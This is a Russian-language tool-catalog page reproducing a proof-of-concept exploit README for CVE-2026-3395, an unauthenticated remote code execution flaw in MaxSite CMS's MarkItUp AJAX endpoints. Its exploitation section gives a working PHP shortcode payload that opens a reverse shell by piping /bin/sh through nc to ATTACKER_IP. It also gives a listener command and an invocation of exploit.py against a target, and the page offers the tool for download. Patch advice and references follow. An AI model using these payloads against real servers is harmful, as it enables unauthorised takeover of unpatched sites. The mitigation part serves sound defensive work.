Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE — Эксплойт класса proof-of-concept для неаутентифицированного удалённого выполнения кода в MaxSite CMS <= 109.1 через AJAX-эндпоинты редактора MarkItUp, с детектированием и полезными нагрузками reverse shell. | Kitploit
Инструменты/GitHubGitHub/mbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubmbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce

CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE

Эксплойт класса proof-of-concept для неаутентифицированного удалённого выполнения кода в MaxSite CMS <= 109.1 через AJAX-эндпоинты редактора MarkItUp, с детектированием и полезными нагрузками reverse shell.

Репозиторий
546 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE‑2026‑3395 — MaxSite CMS Неавторизованное удалённое выполнение кода

Author Country Instagram GitHub CVE Exploit Type CVSS

Обзор

Уязвимость неавторизованного удалённого выполнения кода (RCE) в MaxSite CMS ≤ 109.1.

Проблема возникает из‑за слабых проверок авторизации в AJAX‑конечных точках плагина редактора MarkItUp в сочетании с небезопасным выполнением пользовательского PHP‑кода плагином run_php.

  • Обнаружено / Исправлено: март 2026
  • Исправлено в: MaxSite CMS 109.2
  • Вендор: MaxSite CMS
  • Репозиторий: maxsite/cms

Описание

Уязвимость затрагивает следующие файлы в плагине редактора MarkItUp:

  • preview-ajax.php
  • autosave-post-ajax.php

Эти конечные точки:

  • Доступны без аутентификации
  • Выполняют только слабую проверку referrer (легко обходится)
  • Передают пользовательский ввод плагину run_php
  • Выполняют шорткоды [php]...[/php] с помощью eval()

Злоумышленник может отправить специально сформированный POST‑запрос на маршрут /ajax/, содержащий закодированный в Base64 внутренний путь и вредоносную PHP‑нагрузку через параметр data, что приводит к:

🚨 Полному неавторизованному удалённому выполнению кода


Схема атаки

root@kitploit:~
graph TD
    A["Attacker"] -->|"Malicious POST Request"| B["AJAX Endpoint"]
    B -->|"Referer Spoofing"| C["preview-ajax.php"]
    C -->|"Unsanitized Input"| D["run_php Plugin"]
    D -->|"eval() Execution"| E["Arbitrary PHP Execution"]
    E -->|"Command Execution"| F["Compromised Server"]

Предварительные условия

  • Версия MaxSite CMS ≤ 109.1
  • Плагин run_php включён (обычно по умолчанию)
  • Конфигурация PHP, допускающая eval()

Эксплуатация

Включён эксплойт‑прототип на Python 3 (exploit.py).

Нагрузка для обнаружения (неразрушающая)

root@kitploit:~
[php]echo 'RCE CONFIRMED - ' . phpversion();[/php]

Нагрузка для обратной оболочки

root@kitploit:~
[php]system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f');[/php]

Использование

1. Запустите слушатель

root@kitploit:~
nc -lvnp 9001

2. Запустите эксплойт

root@kitploit:~
python3 exploit.py http://target.com --lhost 10.10.14.22 --lport 9001

Смягчение последствий

Немедленные действия

  • Обновитесь до MaxSite CMS 109.2 или новее
  • Отключите плагин run_php, если он не требуется

Ручной патч

Добавьте проверки аутентификации в уязвимые файлы:

root@kitploit:~
if (!is_login()) {
    die('Access denied');
}
mso_checkreferer();

Ссылки

  • Коммит с исправлением https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3

  • Запись об уязвимости https://vuldb.com/?id.348281

  • Запись NVD https://nvd.nist.gov/vuln/detail/CVE-2026-3395


Правовое уведомление

Этот проект предоставляется для:

  • Исследований в области безопасности
  • Образовательных целей
  • Авторизованного тестирования на проникновение

⚠️ Не используйте против систем без явного разрешения.

Автор не несёт ответственности за неправомерное использование или ущерб.


Автор

Mohammed Idrees Banyamer Иордания 🇯🇴 Исследователь безопасности

banyamer_security — Silent Hunter • Shadow Presence

Март 2026

Скачать инструмент